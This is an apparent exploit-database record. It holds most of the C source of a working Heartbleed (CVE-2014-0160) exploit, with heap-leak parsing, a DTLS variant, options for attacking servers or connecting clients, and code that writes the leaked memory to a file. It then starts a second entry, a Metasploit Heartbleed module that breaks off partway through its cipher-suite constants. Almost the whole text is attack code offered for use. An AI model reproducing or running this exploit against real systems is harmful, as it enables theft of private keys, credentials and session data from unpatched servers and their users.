extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\n \r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n DTLS1_BITMAP *bitmap;\r\n unsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n \r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n \r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->epoch);\r\n memcpy(&(s->s3->read_sequence[2]), p, 6);\r\n p+=6;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n if ( n != i)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n \r\n bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n if ( bitmap == NULL)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n *p == SSL3_MT_CLIENT_HELLO) &&\r\n !dtls1_record_replay_check(s, bitmap))\r\n {\r\n rr->length = 0;\r\n s->packet_length=0;\r\n goto again;\r\n }\r\n \r\n if (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n {\r\n if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n {\r\n dtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n }\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n \r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n orig_len=rr->length;\r\n \r\n dtls1_enc(s,0);\r\n \r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n \r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n \r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n dtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n \r\n dtls1_stop_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_seq++;\r\n c->sslHandle->tlsext_hb_pending = 0;\r\n \r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n \r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n \r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n \r\n return NULL;\r\n }\r\n \r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n shift = -cmp;\r\n if (shift >= sizeof(bitmap->map)*8)\r\n return 0;\r\n else if (bitmap->map & (1UL<<shift))\r\n return 0;\r\n \r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n \r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{ int ret,sat,brw,i;\r\n \r\n if (sizeof(long) == 8) do\r\n { const union { long one; char little; } is_endian = {1};\r\n long l;\r\n \r\n if (is_endian.little) break;\r\n \r\n if (((size_t)v1|(size_t)v2)&0x7) break;\r\n \r\n l = *((long *)v1);\r\n l -= *((long *)v2);\r\n if (l>128) return 128;\r\n else if (l<-128) return -128;\r\n else return (int)l;\r\n } while (0);\r\n \r\n ret = (int)v1[7]-(int)v2[7];\r\n sat = 0;\r\n brw = ret>>8;\r\n if (ret & 0x80)\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= ~brw;\r\n brw >>= 8;\r\n }\r\n }\r\n else\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= brw;\r\n brw >>= 8;\r\n }\r\n }\r\n brw <<= 8;\r\n \r\n if (sat&0xff) return brw | 0x80;\r\n else return brw + (ret&0xFF);\r\n}\r\n \r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n {\r\n DTLS1_RECORD_DATA *rdata;\r\n pitem *item;\r\n \r\n if (pqueue_size(queue->q) >= 100)\r\n return 0;\r\n \r\n rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n item = pitem_new(priority, rdata);\r\n if (rdata == NULL || item == NULL)\r\n {\r\n if (rdata != NULL) OPENSSL_free(rdata);\r\n if (item != NULL) pitem_free(item);\r\n \r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n return(0);\r\n }\r\n \r\n rdata->packet = s->packet;\r\n rdata->packet_length = s->packet_length;\r\n memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n \r\n item->data = rdata;\r\n \r\n#ifndef OPENSSL_NO_SCTP\r\n if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n }\r\n#endif\r\n \r\n if (pqueue_insert(queue->q, item) == NULL)\r\n {\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n s->packet = NULL;\r\n s->packet_length = 0;\r\n memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n \r\n if (!ssl3_setup_buffers(s))\r\n {\r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n return(1);\r\n }\r\n \r\n \r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n shift = cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map <<= shift, bitmap->map |= 1UL;\r\n else\r\n bitmap->map = 1UL;\r\n memcpy(bitmap->max_seq_num,seq,8);\r\n }\r\n else {\r\n shift = -cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map |= 1UL<<shift;\r\n }\r\n }\r\n \r\n \r\nvoid usage(){\r\n printf(\"[\\n\");\r\n printf(\"[ --server|-s <ip/dns> - the server to target\\n\");\r\n printf(\"[ --port|-p <port> - the port to target\\n\");\r\n printf(\"[ --file|-f <filename> - file to write data to\\n\");\r\n printf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\r\n printf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\r\n printf(\"[ 0 = SMTP\\n\");\r\n printf(\"[ 1 = POP3\\n\");\r\n printf(\"[ 2 = IMAP\\n\");\r\n printf(\"[ --loop|-l - loop the exploit attempts\\n\");\r\n printf(\"[ --type|-t <n> - select exploit to try\\n\");\r\n printf(\"[ 0 = null length\\n\");\r\n printf(\"[ 1 = max leak\\n\");\r\n printf(\"[ n = heartbeat payload_length\\n\");\r\n printf(\"[ --udp|-u - use dtls/udp\\n\");\r\n printf(\"[\\n\");\r\n printf(\"[ --verbose|-v - output leak to screen\\n\");\r\n printf(\"[ --help|-h - this output\\n\");\r\n printf(\"[\\n\");\r\n exit(0);\r\n}\r\n \r\nint main(int argc, char* argv[]){\r\n int ret, port, userc, index;\r\n int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n int loop = 0;\r\n struct hostent *h;\r\n connection* c;\r\n char *host, *file;\r\n int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n printf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\r\n printf(\"[ =============================================================\\n\");\r\n static struct option options[] = {\r\n {\"server\", 1, 0, 's'},\r\n {\"port\", 1, 0, 'p'},\r\n {\"file\", 1, 0, 'f'},\r\n {\"type\", 1, 0, 't'},\r\n {\"bind\", 1, 0, 'b'},\r\n {\"verbose\", 0, 0, 'v'},\r\n {\"precmd\", 1, 0, 'c'},\r\n {\"loop\", 0, 0, 'l'},\r\n {\"help\", 0, 0,'h'},\r\n {\"udp\", 0, 0, 'u'}\r\n };\r\n while(userc != -1) {\r\n userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \r\n switch(userc) {\r\n case -1:\r\n break;\r\n case 's':\r\n if(ihost==0){\r\n ihost = 1;\r\n h = gethostbyname(optarg); \r\n if(h==NULL){\r\n printf(\"[!] FATAL: unknown host '%s'\\n\",optarg);\r\n exit(1);\r\n }\r\n host = malloc(strlen(optarg) + 1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n }\r\n break;\r\n case 'p':\r\n if(iport==0){\r\n port = atoi(optarg);\r\n iport = 1;\r\n }\r\n break;\r\n case 'f':\r\n if(ifile==0){\r\n file = malloc(strlen(optarg) + 1);\r\n if(file==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(file,\"%s\",optarg);\r\n ifile = 1;\r\n }\r\n break;\r\n case 't':\r\n if(itype==0){\r\n type = atoi(optarg);\r\n itype = 1;\r\n }\r\n break;\r\n case 'h':\r\n usage();\r\n break;\r\n case 'b':\r\n if(ihost==0){\r\n ihost = 1;\r\n host = malloc(strlen(optarg)+1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n bind = 1;\r\n }\r\n break;\r\n case 'c':\r\n if(iprecmd == 0){\r\n iprecmd = 1;\r\n precmd = atoi(optarg);\r\n }\r\n break;\r\n case 'v':\r\n verbose = 1;\r\n break;\r\n case 'l':\r\n loop = 1;\r\n break;\r\n case 'u':\r\n udp = 1;\r\n break;\r\n \r\n default:\r\n break;\r\n }\r\n }\r\n if(ihost==0||iport==0||ifile==0||itype==0){\r\n printf(\"[ try --help\\n\");\r\n exit(0);\r\n }\r\n ssl_init();\r\n if(bind==0){\r\n if (udp){\r\n c = dtls_client(ret, host, port);\r\n dtlsheartbleed(c, type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_connect(host, port);\r\n pre_cmd(ret, precmd, verbose);\r\n c = tls_connect(ret);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n \r\n SSL_shutdown(c->sslHandle);\r\n close (ret);\r\n SSL_free(c->sslHandle);\r\n }\r\n else{\r\n int sd, pid, i;\r\n if (udp) {\r\n c = dtls_server(sd, host, port);\r\n while (1) {\r\n char * bytes = malloc(1024);\r\n struct sockaddr_in peer;\r\n socklen_t len = sizeof(peer);\r\n if (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n dtlsheartbleed(c,type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_bind(host, port);\r\n while(1){\r\n sd=accept(ret,0,0);\r\n if(sd==-1){\r\n printf(\"[!] FATAL: problem with accept()\\n\");\r\n exit(0);\r\n }\r\n if(pid=fork()){\r\n close(sd);\r\n }\r\n else{\r\n c = tls_bind(sd);\r\n pre_cmd(ret, precmd, verbose);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n printf(\"[ done.\\n\");\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n}\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22172"}, {"lastseen": "2018-01-03T21:23:15", "bulletinFamily": "exploit", "description": "This Metasploit module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable.", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "1337DAY-ID-22129", "href": "https://0day.today/exploit/description/22129", "type": "zdt", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak Exploit", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n\r\n CIPHER_SUITES = [\r\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\r\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\r\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\r\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\r\n 0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\r\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\r\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\r\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\r\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\r\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\r\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\r\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\r\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\r\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\r\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\r\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\r\n 0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\r\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\r\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\r\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\r\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\r\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\r\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\r\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\r\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\r\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\r\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\r\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\r\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\r\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\r\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\r\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\r\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\r\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\r\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\r\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\r\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\r\n 0x00ff # Unknown\r\n ]\r\n\r\n HANDSHAKE_RECORD_TYPE = 0x16\r\n HEARTBEAT_RECORD_TYPE = 0x18\r\n ALERT_RECORD_TYPE = 0x15\r\n 